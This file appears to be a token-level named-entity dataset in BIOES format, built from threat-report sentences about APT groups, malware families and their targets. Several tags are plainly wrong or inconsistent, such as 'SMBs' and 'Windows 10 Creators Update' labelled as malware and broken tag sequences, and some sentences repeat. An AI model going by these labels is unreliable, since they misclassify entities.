O + +Russian S-LOC +citizens—journalists S-IDTY +, O +software B-IDTY +developers E-IDTY +, O +politicians S-IDTY +, O +researchers B-IDTY +at I-IDTY +universities E-IDTY +, O +and O +artists S-IDTY +are O +also O +targeted O +by O +Pawn B-APT +Storm E-APT +. O + +In O +addition O +to O +focused O +targeting O +of O +the O +private O +sector O +with O +ties O +to O +Vietnam S-LOC +, O +APT32 S-APT +has O +also O +targeted O +foreign O +governments S-IDTY +, O +as O +well O +as O +Vietnamese S-LOC +dissidents S-IDTY +and O +journalists S-IDTY +since O +at O +least O +2013 S-TIME +. O + +In O +2014 S-TIME +, O +APT32 S-APT +leveraged O +a O +spear-phishing S-ACT +attachment E-ACT +titled O +" O +Plans O +to O +crackdown O +on O +protesters O +at O +the O +Embassy O +of O +Vietnam.exe S-FILE +, O +" O +which O +targeted O +dissident O +activity O +among O +the O +Vietnamese S-LOC +diaspora S-IDTY +in O +Southeast B-LOC +Asia E-LOC +. O + +In O +2017 S-TIME +, O +social B-IDTY +engineering E-IDTY +content O +in O +lures O +used O +by O +the O +actor S-APT +provided O +evidence O +that O +they O +were O +likely O +used O +to O +target O +members O +of O +the O +Vietnam S-LOC +diaspora S-IDTY +in O +Australia S-LOC +as O +well O +as O +government B-IDTY +employees E-IDTY +in O +the O +Philippines S-LOC +. O + +APT33 S-APT +sent O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +employees S-IDTY +whose O +jobs O +related O +to O +the O +aviation B-IDTY +industry E-IDTY +. O + +APT37 S-APT +targeted O +a O +research B-IDTY +fellow E-IDTY +, O +advisory B-IDTY +member E-IDTY +, O +and O +journalist S-IDTY +associated O +with O +different O +North B-LOC +Korean E-LOC +human O +rights O +issues O +and O +strategic B-IDTY +organizations E-IDTY +. 
O + +The O +majority O +of O +APT37 B-ACT +activity E-ACT +continues O +to O +target O +South B-LOC +Korea E-LOC +, O +North B-LOC +Korean E-LOC +defectors S-IDTY +, O +and O +organizations O +and O +individuals O +involved O +in O +Korean B-LOC +Peninsula E-LOC +reunification O +efforts O +. O + +In O +May B-TIME +2017 E-TIME +, O +APT37 S-APT +used O +a O +bank O +liquidation O +letter O +as O +a O +spear B-ACT +phishing I-ACT +lure E-ACT +against O +a O +board B-IDTY +member E-IDTY +of O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +company E-IDTY +. O + +Per O +the O +complaint O +, O +the O +email S-ACT +account O +watsonhenny@gmail.com S-EMAIL +was O +used O +to O +send O +LinkedIn O +invitations O +to O +employees S-IDTY +of O +a O +bank O +later O +targeted O +by O +APT38 S-APT +. O + +The O +APT38 S-APT +uses O +DYEPACK S-MAL +to O +manipulate O +the O +SWIFT O +transaction O +records O +and O +hide O +evidence O +of O +the O +malicious O +transactions O +, O +so O +bank B-IDTY +personnel E-IDTY +are O +none O +the O +wiser O +when O +they O +review O +recent O +transactions O +. O + +APT39 S-APT +'s O +focus O +on O +the O +telecommunications B-IDTY +and I-IDTY +travel I-IDTY +industries E-IDTY +suggests O +intent O +to O +perform O +monitoring O +, O +tracking O +, O +or O +surveillance O +operations O +against O +specific B-IDTY +individuals E-IDTY +, O +collect O +proprietary O +or O +customer O +data O +for O +commercial O +or O +operational O +purposes O +that O +serve O +strategic O +requirements O +related O +to O +national O +priorities O +, O +or O +create O +additional O +accesses O +and O +vectors O +to O +facilitate O +future O +campaigns S-ACT +. 
O + +Other O +groups S-APT +attributed O +to O +Iranian S-LOC +attackers S-APT +, O +such O +as O +Rocket B-APT +Kitten E-APT +, O +have O +targeted O +Iranian S-LOC +individuals O +in O +the O +past O +, O +including O +anonymous B-IDTY +proxy I-IDTY +users E-IDTY +, O +researchers S-IDTY +, O +journalists S-IDTY +, O +and O +dissidents S-IDTY +. O + +We O +believe O +that O +the O +Carbanak S-MAL +campaign O +is O +a O +clear O +indicator O +of O +a O +new O +era O +in O +cybercrime O +in O +which O +criminals S-APT +use O +APT B-ACT +techniques E-ACT +directly O +against O +the O +financial B-IDTY +industry E-IDTY +instead O +of O +through O +its O +customers S-IDTY +. O + +Carbanak S-MAL +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +The O +group O +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +Gallmaker S-APT +'s O +targets O +are O +embassies S-IDTY +of O +an O +Eastern B-LOC +European E-LOC +country O +. O + +However O +, O +in O +September S-TIME +last O +year O +, O +our O +friends O +at O +CSIS S-SECTEAM +published O +a O +blog O +detailing O +a O +new O +Carbanak S-MAL +variant O +affecting O +one O +of O +its O +customers S-IDTY +. O + +360 S-SECTEAM +and O +Tuisec S-SECTEAM +already O +identified O +some O +Gorgon B-APT +Group E-APT +members S-IDTY +. O + +Symantec S-SECTEAM +also O +confirmed O +seeing O +the O +Lazarus S-APT +wiper O +tool O +in O +Poland S-LOC +at O +one O +of O +their O +customers S-IDTY +. 
O + +This O +new O +campaign O +, O +dubbed O +HaoBao S-ACT +, O +resumes O +Lazarus S-APT +' O +previous O +phishing B-ACT +emails S-TOOL +, O +posed O +as O +employee O +recruitment O +, O +but O +now O +targets O +Bitcoin B-IDTY +users E-IDTY +and O +global O +financial B-IDTY +organizations E-IDTY +. O + +Beginning O +in O +2017 S-TIME +, O +the O +Lazarus B-APT +group E-APT +heavily O +targeted O +individuals O +with O +spear B-ACT +phishing E-ACT +emails S-TOOL +impersonating O +job B-IDTY +recruiters E-IDTY +which O +contained O +malicious O +documents O +. O + +We O +concluded O +that O +Lazarus B-APT +Group E-APT +was O +responsible O +for O +WannaCry S-MAL +, O +a O +destructive O +attack O +in O +May S-TIME +that O +targeted O +Microsoft B-IDTY +customers E-IDTY +. O + +The O +targeting O +of O +this O +individual S-IDTY +suggests O +the O +actors S-APT +are O +interested O +in O +breaching O +the O +French O +Ministry O +of O +Foreign O +Affairs O +itself O +or O +gaining O +insights O +into O +relations O +between O +France S-LOC +and O +Taiwan S-LOC +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +threat O +actors S-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. O + +On O +November B-TIME +10 I-TIME +, I-TIME +2015 E-TIME +, O +Lotus B-APT +Blossom E-APT +sent O +a O +spear-phishing S-ACT +email E-ACT +to O +an O +individual S-IDTY +at O +the O +French O +Ministry O +of O +Foreign O +Affairs O +. O + +APT B-APT +threat I-APT +actors E-APT +, O +most O +likely O +nation O +state-sponsored O +, O +targeted O +a O +diplomat S-IDTY +in O +the O +French O +Ministry O +of O +Foreign O +Affairs O +with O +a O +seemingly O +legitimate O +invitation O +to O +a O +technology O +conference O +in O +Taiwan S-LOC +. 
O + +Additionally O +, O +the O +targeting O +of O +a O +French B-IDTY +diplomat E-IDTY +based O +in O +Taipei O +, O +Taiwan S-LOC +aligns O +with O +previous O +targeting O +by O +these O +actors S-APT +, O +as O +does O +the O +separate O +infrastructure O +. O + +Since O +at O +least O +2014 S-TIME +, O +APT32 S-APT +, O +also O +known O +as O +the O +OceanLotus B-APT +Group E-APT +, O +has O +targeted O +foreign B-IDTY +corporations E-IDTY +with O +investments O +in O +Vietnam S-LOC +, O +foreign B-IDTY +governments E-IDTY +, O +journalists S-IDTY +, O +and O +Vietnamese S-LOC +dissidents S-IDTY +. O + +APT35 S-APT +typically O +targets O +U.S. S-LOC +and O +the O +Middle B-LOC +Eastern E-LOC +military S-IDTY +, O +diplomatic S-IDTY +and O +government B-IDTY +personnel E-IDTY +, O +organizations S-IDTY +in O +the O +media S-IDTY +, O +energy S-IDTY +and O +defense B-IDTY +industrial I-IDTY +base E-IDTY +( O +DIB S-IDTY +) O +, O +and O +engineering S-IDTY +, O +business B-IDTY +services E-IDTY +and O +telecommunications B-IDTY +sectors E-IDTY +. O + +COBALT B-APT +GYPSY E-APT +has O +used O +spearphishing S-ACT +to O +target O +telecommunications S-IDTY +, O +government S-IDTY +, O +defense S-IDTY +, O +oil S-IDTY +, O +and O +financial B-IDTY +services I-IDTY +organizations E-IDTY +based O +in O +or O +affiliated O +with O +the O +MENA S-LOC +region O +, O +identifying O +individual B-IDTY +victims E-IDTY +through O +social B-IDTY +media E-IDTY +sites O +. O + +The O +Magic O +Hound O +has O +repeatedly O +used O +social B-IDTY +media E-IDTY +to O +identify O +and O +interact O +with O +employees S-IDTY +at O +targeted O +organizations O +and O +then O +used O +weaponized O +Excel B-ACT +documents E-ACT +. 
O + +The O +May B-TIME +2014 E-TIME +' O +Operation B-ACT +Saffron I-ACT +Rose E-ACT +' O +publication O +identifies O +an O +Iranian S-LOC +hacking O +group O +formerly O +named O +' O +Ajax B-APT +Security E-APT +' O +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +An O +Iranian S-LOC +hacking O +group O +formerly O +named O +Ajax B-APT +Security E-APT +( O +code-named O +' O +Flying B-APT +Kitten E-APT +' O +by O +CrowdStrike S-SECTEAM +) O +engaged O +in O +active O +spear B-ACT +phishing I-ACT +attacks E-ACT +on O +Iranian S-LOC +dissidents S-IDTY +( O +those O +attempting O +to O +circumvent O +government O +traffic O +monitoring O +) O +. O + +PIVY S-MAL +also O +played O +a O +key O +role O +in O +the O +2011 B-ACT +campaign E-ACT +known O +as O +Nitro O +that O +targeted O +chemical B-IDTY +makers E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +and O +human O +rights O +groups.10,11 O +Still O +active O +a O +year O +later O +, O +the O +Nitro O +attackers S-APT +used O +a O +zero-day S-VULNAME +vulnerability O +in O +Java O +to O +deploy O +PIVY S-MAL +in O +2012 S-TIME +. O + +APT10 S-APT +is O +known O +to O +have O +exfiltrated O +a O +high O +volume O +of O +data O +from O +multiple O +victims O +, O +exploiting O +compromised O +MSP B-MAL +networks E-MAL +, O +and O +those O +of O +their O +customers S-IDTY +, O +to O +stealthily O +move O +this O +data O +around O +the O +world O +. 
O + +Targeted O +sectors O +of O +Molerats S-APT +include O +governmental S-IDTY +and O +diplomatic I-IDTY +institutions E-IDTY +, O +including O +embassies S-IDTY +; O +companies O +from O +the O +aerospace S-IDTY +and O +defence B-IDTY +Industries E-IDTY +; O +financial B-IDTY +institutions E-IDTY +; O +journalists S-IDTY +; O +software B-IDTY +developers E-IDTY +. O + +It O +was O +during O +operator O +X O +'s O +network O +monitoring O +that O +the O +attackers S-APT +placed O +Naikon B-MAL +proxies E-MAL +within O +the O +countries O +' O +borders O +, O +to O +cloak O +and O +support O +real-time O +outbound O +connections O +and O +data O +Exfiltration S-ACT +from O +high-profile O +victim O +organizations E-IDTY +. O + +In O +early B-TIME +May I-TIME +2016 E-TIME +, O +both O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +started O +conducting O +attack B-ACT +campaigns E-ACT +against O +specific B-IDTY +individuals E-IDTY +in O +Europe S-LOC +. O + +Although O +most O +malware O +today O +either O +seeks O +monetary O +gain O +or O +conducts O +espionage S-ACT +for O +economic S-IDTY +advantage O +, O +both O +of O +these O +activity B-APT +groups E-APT +appear O +to O +seek O +information O +about O +specific B-IDTY +individuals E-IDTY +. O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. 
O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. O + +Additionally O +, O +HELIX B-APT +KITTEN I-APT +actors E-APT +have O +shown O +an O +affinity O +for O +creating O +thoroughly O +researched O +and O +structured O +spear-phishing S-ACT +messages O +relevant O +to O +the O +interests O +of O +targeted O +personnel S-IDTY +. O + +The O +attackers S-APT +sent O +multiple O +emails S-TOOL +containing O +macro-enabled O +XLS B-FILE +files E-FILE +to O +employees B-IDTY +working I-IDTY +in I-IDTY +the I-IDTY +banking I-IDTY +sector E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +In O +late O +2015 S-TIME +, O +Symantec S-SECTEAM +identified O +suspicious O +activity O +involving O +a O +hacking O +tool O +used O +in O +a O +malicious O +manner O +against O +one O +of O +our O +customers S-IDTY +. O + +The O +SWC S-ACT +of O +a O +Uyghur O +cultural O +website O +suggests O +intent O +to O +target O +the O +Uyghur B-IDTY +ethnic I-IDTY +group E-IDTY +, O +a O +Muslim B-IDTY +minority I-IDTY +group E-IDTY +primarily O +found O +in O +the O +Xinjiang S-LOC +region O +of O +China O +. O + +It's O +possible O +TG-3390 S-APT +used O +a O +waterhole S-ACT +to O +infect O +data B-IDTY +center I-IDTY +employees E-IDTY +. 
O + +The O +initial O +attack O +vector O +used O +in O +the O +attack O +against O +the O +data O +center O +is O +unclear O +, O +but O +researchers O +believe O +LuckyMouse S-APT +possibly O +had O +conducted O +watering B-ACT +hole E-ACT +or O +phishing B-ACT +attacks E-ACT +to O +compromise O +accounts O +belonging O +to O +employees S-IDTY +at O +the O +national O +data O +center O +. O + +The O +group O +, O +believed O +to O +be O +based O +in O +China S-LOC +, O +has O +also O +targeted O +defense B-IDTY +contractors E-IDTY +, O +colleges S-IDTY +and O +universities S-IDTY +, O +law B-IDTY +firms E-IDTY +, O +and O +political B-IDTY +organizations E-IDTY +— O +including O +organizations O +related O +to O +Chinese O +minority B-IDTY +ethnic I-IDTY +groups E-IDTY +. O + +In O +all O +cases O +, O +based O +on O +the O +nature O +of O +the O +computers O +infected O +by O +Thrip O +, O +it O +appeared O +that O +the O +telecoms B-IDTY +companies E-IDTY +themselves O +and O +not O +their O +customers S-IDTY +were O +the O +targets O +of O +these O +attacks O +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +government B-IDTY +officials E-IDTY +. O + +Turla S-APT +is O +a O +notorious O +group O +that O +has O +been O +targeting O +diplomats S-IDTY +. O + +The O +attackers O +behind O +Epic B-MAL +Turla E-MAL +have O +infected O +several O +hundred O +computers O +in O +more O +than O +45 O +countries O +, O +including O +embassies S-IDTY +. O + +From O +February S-TIME +to O +September B-TIME +2016 E-TIME +, O +WhiteBear B-ACT +activity E-ACT +was O +narrowly O +focused O +on O +embassies S-IDTY +and O +consular O +operations O +around O +the O +world O +. O + +All O +of O +these O +early O +WhiteBear S-MAL +targets O +were O +related O +to O +embassies S-IDTY +and O +diplomatic/foreign O +affair O +organizations O +. 
O + +Thus O +, O +Turla S-APT +operators O +had O +access O +to O +some O +highly O +sensitive O +information O +( O +such O +as O +emails S-TOOL +sent O +by O +the O +German B-IDTY +Foreign I-IDTY +Office I-IDTY +staff E-IDTY +) O +for O +almost O +a O +year O +. O + +We O +suspect O +the O +Kazuar B-MAL +tool E-MAL +may O +be O +linked O +to O +the O +Turla S-APT +threat O +actor O +group O +( O +also O +known O +as O +Uroburos S-APT +and O +Snake S-APT +) O +, O +who O +have O +been O +reported O +to O +have O +compromised O +embassies S-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +educational B-IDTY +institutions E-IDTY +, O +and O +research B-IDTY +organizations E-IDTY +across O +the O +globe O +. O + +Deepen S-SECTEAM +told O +Threatpost O +the O +group O +has O +been O +operating O +since O +at O +least O +since O +2008 S-TIME +and O +has O +targeted O +China B-IDTY +and I-IDTY +US I-IDTY +relations I-IDTY +experts E-IDTY +, O +Defense B-SECTEAM +Department E-SECTEAM +entities O +, O +and O +geospatial B-IDTY +groups E-IDTY +within O +the O +federal B-IDTY +government E-IDTY +. O + +Government B-IDTY +officials E-IDTY +said O +they O +knew O +the O +initial O +attack O +occurred O +in O +2011 S-TIME +, O +but O +are O +unaware O +of O +who O +specifically O +is O +behind O +the O +attacks O +. O + +Bahamut O +was O +first O +noticed O +when O +it O +targeted O +a O +Middle B-IDTY +Eastern I-IDTY +human I-IDTY +rights I-IDTY +activist E-IDTY +in O +the O +first O +week O +of O +January B-TIME +2017 E-TIME +. O + +Later O +that O +month O +, O +the O +same O +tactics O +and O +patterns O +were O +seen O +in O +attempts O +against O +an O +Iranian B-IDTY +women I-IDTY +'s I-IDTY +activist E-IDTY +– O +an O +individual S-IDTY +commonly O +targeted O +by O +Iranian B-LOC +actors E-LOC +, O +such O +as O +Charming O +Kitten O +and O +the O +Sima B-ACT +campaign E-ACT +documented O +in O +our O +2016 S-TIME +Black O +Hat O +talk O +. 
O + +Several O +times O +, O +APT5 S-APT +has O +targeted O +organizations S-IDTY +and O +personnel S-IDTY +based O +in O +Southeast B-LOC +Asia E-LOC +. O + +Given O +our O +increased O +confidence O +that O +Bahamut O +was O +responsible O +for O +targeting O +of O +Qatari S-LOC +labor B-IDTY +rights I-IDTY +advocates E-IDTY +and O +its O +focus O +on O +the O +foreign B-IDTY +policy I-IDTY +institutions E-IDTY +other O +Gulf O +states O +, O +Bahamut O +'s O +interests O +are O +seemingly O +too O +expansive O +to O +be O +limited O +one O +sponsor O +or O +customer O +. O + +Barium S-APT +specializes O +in O +targeting O +high O +value O +organizations O +holding O +sensitive O +data O +, O +by O +gathering O +extensive O +information O +about O +their O +employees S-IDTY +through O +publicly O +available O +information O +and O +social B-IDTY +media E-IDTY +, O +using O +that O +information O +to O +fashion O +phishing B-ACT +attacks E-ACT +intended O +to O +trickthose O +employees S-IDTY +into O +compromising O +their O +computers O +and O +networks O +. O + +Barium S-APT +has O +targeted O +Microsoft B-IDTY +customers E-IDTY +both O +in O +Virginia O +, O +the O +United O +States O +, O +and O +around O +the O +world O +. O + +BLACKGEAR S-ACT +is O +an O +espionage B-ACT +campaign E-ACT +which O +has O +targeted O +users S-IDTY +in O +Taiwan S-LOC +for O +many O +years O +. O + +Our O +research O +indicates O +that O +it O +has O +started O +targeting O +Japanese B-IDTY +users E-IDTY +. O + +Our O +experts O +have O +found O +that O +cybercriminals O +are O +actively O +focusing O +on O +SMBs S-MAL +, O +and O +giving O +particular O +attention O +to O +accountants S-IDTY +. 
O + +Clever B-APT +Kitten E-APT +actors O +have O +a O +strong O +affinity O +for O +PHP O +server-side O +attacks O +to O +make O +access O +; O +this O +is O +relatively O +unique O +amongst O +targeted O +attackers O +who O +often O +favor O +targeting O +a O +specific O +individual S-IDTY +at O +a O +specific O +organization O +using O +social B-IDTY +engineering E-IDTY +. O + +Some O +of O +the O +exploit S-VULNAME +server O +paths O +contain O +modules O +that O +appear O +to O +have O +been O +designed O +to O +infect O +Linux S-OS +computers O +, O +but O +we O +have O +not O +yet O +located O +the O +Linux S-OS +backdoor O +. O + +Confucius O +targeted O +a O +particular O +set O +of O +individuals O +in O +South O +Asian O +countries O +, O +such O +as O +military B-IDTY +personnel E-IDTY +and O +businessmen S-IDTY +, O +among O +others O +. O + +According O +to O +statistics O +, O +Corkow S-MAL +primarily O +targets O +users S-IDTY +in O +Russia O +and O +the O +CIS O +, O +but O +it O +is O +worth O +noting O +that O +in O +2014 S-TIME +the O +amount O +of O +attacks O +targeting O +the O +USA O +increased O +by O +5 O +times O +, O +in O +comparison O +with O +2011 S-TIME +. O + +The O +threat O +is O +likely O +targeting O +employees S-IDTY +of O +various O +Palestinian S-LOC +government B-IDTY +agencies E-IDTY +, O +security B-IDTY +services E-IDTY +, O +Palestinian O +students S-IDTY +, O +and O +those O +affiliated O +with O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +For O +example O +, O +the O +actors O +behind O +FrozenCell S-MAL +used O +a O +spoofed O +app O +called O +Tawjihi B-MAL +2016 E-MAL +, O +which O +Jordanian S-LOC +or O +Palestinian S-LOC +students S-IDTY +would O +ordinarily O +use O +during O +their O +general O +secondary O +examination O +. 
O + +The O +titles O +and O +contents O +of O +these O +files O +suggest O +that O +the O +actor O +targeted O +individuals O +affiliated O +with O +these O +government B-IDTY +agencies E-IDTY +and O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +Political B-IDTY +entities E-IDTY +in O +Central O +Asia O +have O +been O +targeted O +throughout O +2018 S-TIME +by O +different O +actors O +, O +including O +IndigoZebra S-APT +, O +Sofacy S-APT +( O +with O +Zebrocy S-MAL +malware S-MAL +) O +and O +most O +recently O +by O +DustSquad O +( O +with O +Octopus S-MAL +malware S-MAL +) O +. O + +Targets O +included O +a O +wide O +array O +of O +high-profile O +entities O +, O +including O +intelligence B-IDTY +services E-IDTY +, O +military S-IDTY +, O +utility B-IDTY +providers E-IDTY +( O +telecommunications S-IDTY +and O +power S-IDTY +) O +, O +embassies S-IDTY +, O +and O +government B-IDTY +institutions E-IDTY +. O + +The O +computers O +of O +diplomats S-IDTY +, O +military B-IDTY +attachés E-IDTY +, O +private B-IDTY +assistants E-IDTY +, O +secretaries S-IDTY +to O +Prime B-IDTY +Ministers E-IDTY +, O +journalists S-IDTY +and O +others O +are O +under O +the O +concealed O +control O +of O +unknown O +assailant O +(s O +) O +. O + +The O +banking O +malware O +GozNym S-MAL +has O +legs O +; O +only O +a O +few O +weeks O +after O +the O +hybrid O +Trojan S-MAL +was O +discovered O +, O +it O +has O +reportedly O +spread O +into O +Europe O +and O +begun O +plaguing O +banking B-IDTY +customers E-IDTY +in O +Poland O +with O +redirection B-ACT +attacks E-ACT +. O + +We O +noted O +in O +our O +original O +blog O +the O +large O +amount O +of O +targeting O +of O +Iranian S-LOC +citizens S-IDTY +in O +this O +campaign O +, O +we O +observed O +almost O +one-third O +of O +all O +victims O +to O +be O +Iranian O +. 
O + +Since O +early O +2013 S-TIME +, O +we O +have O +observed O +activity O +from O +a O +unique O +threat O +actor O +group O +, O +which O +we O +began O +to O +investigate O +based O +on O +increased O +activities S-ACT +against O +human O +right O +activists S-IDTY +in O +the O +beginning O +of O +2015 S-TIME +. O + +Over O +the O +course O +of O +three O +years O +of O +observation O +of O +campaigns S-ACT +targeting O +civil B-IDTY +society E-IDTY +and O +human B-IDTY +rights I-IDTY +organizations E-IDTY +, O +from O +records O +of O +well O +over O +two O +hundred O +spearphishing S-ACT +and O +other O +intrusion O +attempts O +against O +individuals O +inside O +of O +Iran S-LOC +and O +in O +the O +diaspora S-IDTY +, O +a O +narrative O +of O +persistent O +intrusion O +efforts O +emerges O +. O + +Over O +the O +months O +following O +the O +elections O +, O +the O +accounts O +of O +Iranians S-IDTY +that O +had O +been O +compromised O +by O +the O +actors O +were O +then O +used O +for O +spreading O +the O +malware O +. O + +The O +Infy S-MAL +malware S-MAL +was O +seen O +targeting O +Iranians S-IDTY +again O +in O +June B-TIME +2015 E-TIME +, O +when O +it O +was O +shared O +with O +researchers O +after O +being O +sent O +to O +a O +broadcast B-IDTY +journalist E-IDTY +at O +BBC B-IDTY +Persian E-IDTY +with O +a O +generic O +introduction O +and O +a O +PowerPoint S-TOOL +presentation O +attached O +titled O +" O +Nostalogy O +" O +( O +sic O +) O +. O + +One O +narrowly-targeted O +spearphishing S-ACT +from O +Infy O +was O +sent O +from O +the O +compromised O +account O +of O +a O +political B-IDTY +activist E-IDTY +promoting O +participation O +inside O +of O +Iran S-LOC +, O +claiming O +to O +be O +a O +set O +of O +images O +of O +a O +British-Iranian S-IDTY +dual O +national O +that O +has O +been O +held O +in O +Evin O +Prison O +for O +five O +years O +on O +espionage O +charges O +. 
O + +As O +in O +the O +past O +, O +these O +messages O +have O +been O +sent O +accounts O +believed O +to O +be O +fake O +and O +accounts O +compromised O +by O +Infy O +, O +including O +Kurdish B-IDTY +activists E-IDTY +that O +had O +previously O +been O +compromised O +by O +the O +Flying B-APT +Kitten I-APT +actor I-APT +group E-APT +. O + +The O +Windows B-MAL +10 I-MAL +Creators I-MAL +Update E-MAL +will O +bring O +several O +enhancements O +to O +Windows B-SECTEAM +Defender I-SECTEAM +ATP E-SECTEAM +that O +will O +provide O +SOC B-IDTY +personnel E-IDTY +with O +options O +for O +immediate O +mitigation O +of O +a O +detected O +threat O +. O + +LEAD O +and O +Barium S-APT +are O +not O +known O +for O +large-scale O +spear-phishing S-ACT +, O +so O +it O +is O +unlikely O +that O +SOC B-IDTY +personnel E-IDTY +would O +have O +to O +deal O +with O +multiple O +machines O +having O +been O +compromised O +by O +these O +groups O +at O +the O +same O +time O +. O + +While O +the O +machine O +is O +in O +isolation O +, O +SOC B-IDTY +personnel E-IDTY +can O +direct O +the O +infected O +machine O +to O +collect O +live O +investigation O +data O +, O +such O +as O +the O +DNS S-PROT +cache O +or O +security O +event O +logs O +, O +which O +they O +can O +use O +to O +verify O +alerts O +, O +assess O +the O +state O +of O +the O +intrusion O +, O +and O +support O +follow-up O +actions O +. O + +The O +samples O +provided O +were O +alleged O +to O +be O +targeting O +Tibetan S-LOC +and O +Chinese B-LOC +Pro-Democracy I-IDTY +Activists E-IDTY +. O + +They O +are O +often O +targeted O +simultaneously O +with O +other O +ethnic B-IDTY +minorities E-IDTY +and O +religious B-IDTY +groups E-IDTY +in O +China S-LOC +. 
O + +Examples O +as O +early O +as O +2008 S-TIME +document B-FILE +malware E-FILE +operations O +against O +Tibetan B-IDTY +non-governmental I-IDTY +organizations E-IDTY +( O +NGOs S-IDTY +) O +that O +also O +targeted O +Falun B-IDTY +Gong E-IDTY +and O +Uyghur B-IDTY +groups E-IDTY +. O + +Unit B-SECTEAM +42 E-SECTEAM +recently O +identified O +a O +targeted B-ACT +attack E-ACT +against O +an O +individual O +working O +for O +the O +Foreign B-IDTY +Ministry E-IDTY +of O +Uzbekistan B-LOC +in I-LOC +China E-LOC +. O + +NetTraveler S-MAL +has O +been O +used O +to O +target O +diplomats S-IDTY +, O +embassies S-IDTY +and O +government B-IDTY +institutions E-IDTY +for O +over O +a O +decade O +, O +and O +remains O +the O +tool O +of O +choice O +by O +the O +adversaries O +behind O +these O +cyber B-ACT +espionage I-ACT +campaigns E-ACT +. O + +The O +NetTraveler O +group O +has O +infected O +victims O +across O +multiple O +establishments O +in O +both O +the O +public O +and O +private O +sector O +including O +government B-IDTY +institutions E-IDTY +, O +embassies S-IDTY +, O +the O +oil B-IDTY +and I-IDTY +gas I-IDTY +industry E-IDTY +, O +research O +centers O +, O +military B-IDTY +contractors E-IDTY +and O +activists S-IDTY +. O + +The O +main O +point O +that O +sets O +Operation B-ACT +Groundbait E-ACT +apart O +from O +the O +other O +attacks O +is O +that O +it O +has O +mostly O +been O +targeting O +anti-government B-IDTY +separatists E-IDTY +in O +the O +self-declared O +Donetsk O +and O +Luhansk O +People O +'s O +Republics O +. O + +Although O +Silence O +'s O +phishing B-ACT +emails S-TOOL +were O +also O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +Central B-LOC +and I-LOC +Western I-LOC +Europe E-LOC +, O +Africa S-LOC +, O +and O +Asia S-LOC +) O +. 
O + +They O +tried O +new O +techniques O +to O +steal O +from O +banking O +systems O +, O +including O +AWS O +CBR O +( O +the O +Russian S-LOC +Central B-IDTY +Bank I-IDTY +'s I-IDTY +Automated I-IDTY +Workstation I-IDTY +Client E-IDTY +) O +, O +ATMs S-IDTY +, O +and O +card O +processing O +. O + +However O +, O +some O +phishing B-ACT +emails S-TOOL +were O +sent O +to O +bank B-IDTY +employees E-IDTY +in O +more O +than O +25 O +countries O +of O +Central S-LOC +and O +Western S-LOC +Europe S-LOC +, O +Africa S-LOC +and O +Asia S-LOC +including O +: O +Kyrgyzstan S-LOC +, O +Armenia S-LOC +, O +Georgia S-LOC +, O +Serbia S-LOC +, O +Germany S-LOC +, O +Latvia S-LOC +, O +Czech B-LOC +Republic E-LOC +, O +Romania S-LOC +, O +Kenya S-LOC +, O +Israel S-LOC +, O +Cyprus S-LOC +, O +Greece S-LOC +, O +Turkey S-LOC +, O +Taiwan S-LOC +, O +Malaysia S-LOC +, O +Switzerland S-LOC +, O +Vietnam S-LOC +, O +Austria S-LOC +, O +Uzbekistan S-LOC +, O +Great B-LOC +Britain E-LOC +, O +Hong B-LOC +Kong E-LOC +, O +and O +others O +. O + +An O +interesting O +point O +in O +the O +Silence B-ACT +attack E-ACT +is O +that O +the O +cybercriminals O +had O +already O +compromised O +banking S-IDTY +infrastructure O +in O +order O +to O +send O +their O +spear-phishing S-ACT +emails S-TOOL +from O +the O +addresses O +of O +real O +bank B-IDTY +employees E-IDTY +and O +look O +as O +unsuspicious O +as O +possible O +to O +future O +victims O +. O + +A O +preliminary O +analysis O +caught O +the O +attention O +of O +our O +Threat O +Analysis O +and O +Intelligence O +team O +as O +it O +yielded O +interesting O 